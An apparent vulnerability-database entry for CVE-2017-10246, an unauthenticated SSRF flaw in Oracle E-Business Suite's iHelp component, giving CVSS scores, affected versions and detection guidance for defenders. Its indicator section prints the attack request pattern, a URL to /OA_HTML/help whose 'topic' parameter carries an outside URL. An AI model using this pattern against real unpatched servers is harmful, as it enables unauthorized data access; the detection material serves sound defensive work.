cbcvebase.
CVE-2017-10246
published 2017-08-08

CVE-2017-10246: Vulnerability in the Oracle Application Object Library component of Oracle E-Business Suite (subcomponent: iHelp). Supported versions that are affected are…

PriorityP266high8.2CVSS 3.0
AVNACLPRNUINSUCHILAN
EXPLOIT
EPSS
13.94%
96.1th percentile
Vulnerability in the Oracle Application Object Library component of Oracle E-Business Suite (subcomponent: iHelp). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Application Object Library accessible data as well as unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N).

Affected

10 ranges
VendorProductVersion rangeFixed in
oracleapplication_object_library
oracleapplication_object_library
oracleapplication_object_library
oracleapplication_object_library
oracleapplication_object_library
oracle_corporationapplication_object_library
oracle_corporationapplication_object_library
oracle_corporationapplication_object_library
oracle_corporationapplication_object_library
oracle_corporationapplication_object_library

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://<host>/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://
path/OA_HTML/help
  • Detect SSRF attempts via the 'topic' parameter in /OA_HTML/help — look for HTTP/HTTPS URLs or internal IP addresses supplied as the value of the 'topic' query parameter.
  • Monitor outbound HTTP requests originating from the EBS application server to internal RFC-1918 addresses or unexpected external hosts, which may indicate SSRF exploitation via the iHelp subcomponent.
  • Alert on unauthenticated GET requests to /OA_HTML/help containing a 'topic' parameter whose value begins with 'http://' or 'https://', especially from external/untrusted source IPs.
  • ·Affected versions are Oracle E-Business Suite 12.1.3, 12.2.3, 12.2.4, 12.2.5, and 12.2.6 only; detections should be scoped to these versions.
  • ·The vulnerability is in the iHelp subcomponent of Oracle Application Object Library; ensure WAF/IDS rules target the /OA_HTML/help endpoint specifically.
  • ·The vendor patch was released on 18 July 2017; patched systems should no longer be vulnerable, so detections are most relevant for unpatched deployments.

CVSS provenance

nvdv3.08.2HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.